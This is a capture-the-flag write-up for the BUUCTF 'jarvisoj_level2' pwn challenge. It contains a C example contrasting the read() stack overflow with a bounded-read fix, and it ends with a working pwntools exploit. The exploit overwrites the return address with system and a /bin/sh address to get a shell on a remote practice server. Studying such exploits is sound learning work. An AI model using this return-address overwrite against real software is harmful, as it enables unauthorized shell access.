BUUCTF-PWN-jarvisoj_level2

checksec

[screenshot: checksec output]

IDA

[screenshots: IDA disassembly / decompilation of the binary]

The read() call is the overflow point: it reads more input into the stack buffer than the buffer can hold.
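To make the bug concrete from the defender's side, here is an added C example (not code from the writeup or from the challenge binary) that puts the vulnerable pattern next to a hardened replacement. The buffer size 0x88 is assumed from the padding length used later in the payload; the overlong read length, the helper names `read_bounded` and `bytes_stored_for_input`, and the pipe-based test input are all constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed from the payload offset in the writeup (0x88 bytes before saved ebp);
 * the real stack layout is only visible in the IDA screenshots. */
#define BUF_SIZE 0x88

/* Shape of the challenge's bug, reconstructed for illustration (not the binary's
 * own code): the length handed to read() is larger than the buffer, so any input
 * beyond BUF_SIZE bytes lands on top of the saved ebp and return address.
 * Never called here; it exists only to sit beside the fixed version. */
void vulnerable_read(int fd) {
    char buf[BUF_SIZE];
    read(fd, buf, 2 * BUF_SIZE); /* length not tied to sizeof(buf): stack overflow */
}

/* Hardened form: the read length is derived from the buffer size, one byte is
 * reserved for a terminating NUL, and the caller learns how many bytes were
 * actually stored. Returns -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t buf_size) {
    if (buf == NULL || buf_size == 0)
        return -1;
    ssize_t n = read(fd, buf, buf_size - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Self-contained check: feed input_len bytes (constructed, all 'a') through a
 * pipe into a BUF_SIZE stack buffer via read_bounded and report how many were
 * stored. Overlong input is truncated to BUF_SIZE - 1 instead of spilling. */
ssize_t bytes_stored_for_input(size_t input_len) {
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    char *input = malloc(input_len > 0 ? input_len : 1);
    if (input == NULL) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    memset(input, 'a', input_len);

    size_t off = 0;
    while (off < input_len) {
        ssize_t w = write(fds[1], input + off, input_len - off);
        if (w < 0) {
            free(input);
            close(fds[0]);
            close(fds[1]);
            return -1;
        }
        off += (size_t)w;
    }
    close(fds[1]); /* writer closed, so a short read means EOF, not a hang */
    free(input);

    char buf[BUF_SIZE];
    ssize_t n = read_bounded(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;
}

int main(void) {
    printf("0x100-byte input -> %zd bytes stored (buffer holds %d)\n",
           bytes_stored_for_input(0x100), BUF_SIZE);
    printf("16-byte input    -> %zd bytes stored\n", bytes_stored_for_input(16));
    return 0;
}
```

The fix is the usual one: the size argument must come from the buffer, not from a constant chosen independently of it. A stack canary (visible in checksec output as "Canary found") would turn the overwrite into an abort rather than a control-flow hijack, but only bounding the read removes the bug.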

Looking through the strings, there is a /bin/sh string in the binary.

[screenshot: IDA strings window showing /bin/sh]

Find the address of the /bin/sh string.

[screenshot: address of the /bin/sh string]

Then find the address of system in the .text segment.

[screenshot: address of system in .text]

EXP

from pwn import *

p = remote('node4.buuoj.cn', 29211)

# 0x88 bytes fill the buffer and 4 more cover the saved ebp; the return address is
# then overwritten with the .text address of system found above, followed by the
# address of the /bin/sh string, which system picks up as its argument
payload = b'a' * (0x88 + 0x4) + p32(0x804845C) + p32(0x804A024)
p.sendlineafter(b'\n', payload)

p.interactive()

Result

[screenshot: interactive shell obtained]